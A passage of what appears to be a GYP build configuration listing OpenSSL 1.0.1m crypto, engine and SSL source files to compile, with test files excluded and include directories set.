"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_depr.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_err.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_gen.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_key.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_ossl.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_vrf.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsatest.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_beos.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_dl.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_dlfcn.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_err.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_null.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_openssl.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_vms.c",
"1.0.1m/openssl-1.0.1m/crypto/dso/dso_win32.c",
"1.0.1m/openssl-1.0.1m/crypto/ebcdic.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec2_mult.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec2_oct.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec2_smpl.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_check.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_curve.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_cvt.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_err.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_key.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_mult.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_oct.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ec_print.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/eck_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_mont.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_nist.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_nistp224.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_nistp256.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_nistp521.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_nistputil.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_oct.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ecp_smpl.c",
"1.0.1m/openssl-1.0.1m/crypto/ec/ectest.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdh/ecdhtest.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdh/ech_err.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdh/ech_key.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdh/ech_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdh/ech_ossl.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecdsatest.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecs_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecs_err.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecs_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecs_ossl.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecs_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/ecdsa/ecs_vrf.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_all.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_cnf.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_cryptodev.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_ctrl.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_dyn.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_err.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_fat.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_init.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_list.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_openssl.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_rdrand.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_rsax.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/eng_table.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/enginetest.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_asnmth.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_cipher.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_dh.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_digest.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_dsa.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_ecdh.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_ecdsa.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_pkmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_rand.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_rsa.c",
"1.0.1m/openssl-1.0.1m/crypto/engine/tb_store.c",
"1.0.1m/openssl-1.0.1m/crypto/err/err.c",
"1.0.1m/openssl-1.0.1m/crypto/err/err_all.c",
"1.0.1m/openssl-1.0.1m/crypto/err/err_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/bio_b64.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/bio_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/bio_md.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/bio_ok.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/c_all.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/c_allc.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/c_alld.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/digest.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_aes.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_aes_cbc_hmac_sha1.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_bf.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_camellia.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_cast.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_des.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_des3.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_idea.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_null.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_old.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_rc2.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_rc4.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_rc4_hmac_md5.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_rc5.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_seed.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/e_xcbc_d.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/encode.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_acnf.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_cnf.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_err.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_fips.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_key.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_pbe.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/evp_test.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_dss.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_dss1.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_ecdsa.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_md4.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_md5.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_mdc2.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_null.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_ripemd.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_sha.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_sha1.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_sigver.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/m_wp.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/names.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p5_crpt.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p5_crpt2.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_dec.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_open.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_seal.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/p_verify.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/pmeth_fn.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/pmeth_gn.c",
"1.0.1m/openssl-1.0.1m/crypto/evp/pmeth_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ex_data.c",
"1.0.1m/openssl-1.0.1m/crypto/fips_ers.c",
"1.0.1m/openssl-1.0.1m/crypto/hmac/hm_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/hmac/hm_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/hmac/hmac.c",
"1.0.1m/openssl-1.0.1m/crypto/hmac/hmactest.c",
"1.0.1m/openssl-1.0.1m/crypto/idea/i_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/idea/i_cfb64.c",
"1.0.1m/openssl-1.0.1m/crypto/idea/i_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/idea/i_ofb64.c",
"1.0.1m/openssl-1.0.1m/crypto/idea/i_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/idea/ideatest.c",
"1.0.1m/openssl-1.0.1m/crypto/krb5/krb5_asn.c",
"1.0.1m/openssl-1.0.1m/crypto/lhash/lh_stats.c",
"1.0.1m/openssl-1.0.1m/crypto/lhash/lhash.c",
"1.0.1m/openssl-1.0.1m/crypto/md4/md4_dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/md4/md4_one.c",
"1.0.1m/openssl-1.0.1m/crypto/md4/md4test.c",
"1.0.1m/openssl-1.0.1m/crypto/md5/md5_dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/md5/md5_one.c",
"1.0.1m/openssl-1.0.1m/crypto/md5/md5test.c",
"1.0.1m/openssl-1.0.1m/crypto/mdc2/mdc2_one.c",
"1.0.1m/openssl-1.0.1m/crypto/mdc2/mdc2dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/mdc2/mdc2test.c",
"1.0.1m/openssl-1.0.1m/crypto/mem.c",
"1.0.1m/openssl-1.0.1m/crypto/mem_clr.c",
"1.0.1m/openssl-1.0.1m/crypto/mem_dbg.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/cbc128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/ccm128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/cfb128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/ctr128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/cts128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/gcm128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/ofb128.c",
"1.0.1m/openssl-1.0.1m/crypto/modes/xts128.c",
"1.0.1m/openssl-1.0.1m/crypto/o_dir.c",
"1.0.1m/openssl-1.0.1m/crypto/o_fips.c",
"1.0.1m/openssl-1.0.1m/crypto/o_init.c",
"1.0.1m/openssl-1.0.1m/crypto/o_str.c",
"1.0.1m/openssl-1.0.1m/crypto/o_time.c",
"1.0.1m/openssl-1.0.1m/crypto/objects/o_names.c",
"1.0.1m/openssl-1.0.1m/crypto/objects/obj_dat.c",
"1.0.1m/openssl-1.0.1m/crypto/objects/obj_err.c",
"1.0.1m/openssl-1.0.1m/crypto/objects/obj_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/objects/obj_xref.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_asn.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_cl.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_err.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_ext.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_ht.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_srv.c",
"1.0.1m/openssl-1.0.1m/crypto/ocsp/ocsp_vfy.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_all.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_err.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_info.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_oth.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_pk8.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_seal.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_x509.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pem_xaux.c",
"1.0.1m/openssl-1.0.1m/crypto/pem/pvkfmt.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_add.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_asn.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_attr.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_crpt.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_crt.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_decr.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_init.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_key.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_kiss.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_mutl.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_npas.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_p8d.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_p8e.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/p12_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs12/pk12err.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/bio_pk7.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pk7_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pk7_attr.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pk7_doit.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pk7_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pk7_mime.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pk7_smime.c",
"1.0.1m/openssl-1.0.1m/crypto/pkcs7/pkcs7err.c",
"1.0.1m/openssl-1.0.1m/crypto/pqueue/pqueue.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/md_rand.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_egd.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_err.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_nw.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_os2.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_unix.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/rand_win.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/randfile.c",
"1.0.1m/openssl-1.0.1m/crypto/rand/randtest.c",
"1.0.1m/openssl-1.0.1m/crypto/rc2/rc2_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/rc2/rc2_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/rc2/rc2_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/rc2/rc2cfb64.c",
"1.0.1m/openssl-1.0.1m/crypto/rc2/rc2ofb64.c",
"1.0.1m/openssl-1.0.1m/crypto/rc2/rc2test.c",
#"1.0.1m/openssl-1.0.1m/crypto/rc4/rc4_enc.c",
#"1.0.1m/openssl-1.0.1m/crypto/rc4/rc4_skey.c",
#"1.0.1m/openssl-1.0.1m/crypto/rc4/rc4_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/rc4/rc4test.c",
"1.0.1m/openssl-1.0.1m/crypto/ripemd/rmd_dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/ripemd/rmd_one.c",
"1.0.1m/openssl-1.0.1m/crypto/ripemd/rmdtest.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_chk.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_crpt.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_depr.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_eay.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_err.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_gen.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_none.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_null.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_oaep.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_pk1.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_pss.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_saos.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_ssl.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_test.c",
"1.0.1m/openssl-1.0.1m/crypto/rsa/rsa_x931.c",
"1.0.1m/openssl-1.0.1m/crypto/seed/seed.c",
"1.0.1m/openssl-1.0.1m/crypto/seed/seed_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/seed/seed_cfb.c",
"1.0.1m/openssl-1.0.1m/crypto/seed/seed_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/seed/seed_ofb.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha1_one.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha1dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha1test.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha256.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha256t.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha512.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha512t.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha_dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha_one.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/shatest.c",
"1.0.1m/openssl-1.0.1m/crypto/srp/srp_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/srp/srp_vfy.c",
"1.0.1m/openssl-1.0.1m/crypto/srp/srptest.c",
"1.0.1m/openssl-1.0.1m/crypto/stack/stack.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_conf.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_err.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_req_print.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_req_utils.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_rsp_print.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_rsp_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_rsp_utils.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_rsp_verify.c",
"1.0.1m/openssl-1.0.1m/crypto/ts/ts_verify_ctx.c",
"1.0.1m/openssl-1.0.1m/crypto/txt_db/txt_db.c",
"1.0.1m/openssl-1.0.1m/crypto/ui/ui_compat.c",
"1.0.1m/openssl-1.0.1m/crypto/ui/ui_err.c",
"1.0.1m/openssl-1.0.1m/crypto/ui/ui_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/ui/ui_openssl.c",
"1.0.1m/openssl-1.0.1m/crypto/ui/ui_util.c",
"1.0.1m/openssl-1.0.1m/crypto/uid.c",
"1.0.1m/openssl-1.0.1m/crypto/whrlpool/wp_block.c",
"1.0.1m/openssl-1.0.1m/crypto/whrlpool/wp_dgst.c",
"1.0.1m/openssl-1.0.1m/crypto/whrlpool/wp_test.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/by_dir.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/by_file.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_att.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_cmp.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_d2.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_def.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_err.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_ext.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_lu.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_obj.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_r2x.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_req.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_set.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_trs.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_txt.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_v3.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_vfy.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509_vpm.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509cset.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509name.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509rset.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509spki.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x509type.c",
"1.0.1m/openssl-1.0.1m/crypto/x509/x_all.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/pcy_cache.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/pcy_data.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/pcy_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/pcy_map.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/pcy_node.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/pcy_tree.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_addr.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_akey.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_akeya.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_alt.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_asid.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_bcons.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_bitst.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_conf.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_cpols.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_crld.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_enum.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_extku.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_genn.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_ia5.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_info.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_int.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_ncons.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_ocsp.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_pci.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_pcia.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_pcons.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_pku.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_pmaps.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_purp.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_sxnet.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/x509v3/v3err.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/e_gost_err.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost2001.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost2001_keyx.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost89.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost94_keyx.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_ameth.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_asn1.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_crypt.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_ctl.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_eng.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_keywrap.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_md.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_params.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_pmeth.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gost_sign.c",
"1.0.1m/openssl-1.0.1m/engines/ccgost/gosthash.c",
"1.0.1m/openssl-1.0.1m/engines/e_4758cca.c",
"1.0.1m/openssl-1.0.1m/engines/e_aep.c",
"1.0.1m/openssl-1.0.1m/engines/e_atalla.c",
"1.0.1m/openssl-1.0.1m/engines/e_capi.c",
"1.0.1m/openssl-1.0.1m/engines/e_chil.c",
"1.0.1m/openssl-1.0.1m/engines/e_cswift.c",
"1.0.1m/openssl-1.0.1m/engines/e_gmp.c",
"1.0.1m/openssl-1.0.1m/engines/e_nuron.c",
"1.0.1m/openssl-1.0.1m/engines/e_padlock.c",
"1.0.1m/openssl-1.0.1m/engines/e_sureware.c",
"1.0.1m/openssl-1.0.1m/engines/e_ubsec.c",
# these are from ssl/Makefile, not sure why these didn't
# show up in the Windows nt.mak file.
"1.0.1m/openssl-1.0.1m/ssl/*.c"
],
"sources!": [
# exclude various tests that provide an impl of main():
"1.0.1m/openssl-1.0.1m/crypto/*/*test.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha256t.c",
"1.0.1m/openssl-1.0.1m/crypto/sha/sha512t.c",
"1.0.1m/openssl-1.0.1m/crypto/*test.c",
"1.0.1m/openssl-1.0.1m/ssl/*test.c",
"1.0.1m/openssl-1.0.1m/ssl/ssl_task*.c"
],
"direct_dependent_settings": {
"include_dirs": [
"1.0.1m/openssl-1.0.1m/include"
]
},
"include_dirs": [
"1.0.1m/openssl-1.0.1m/include",
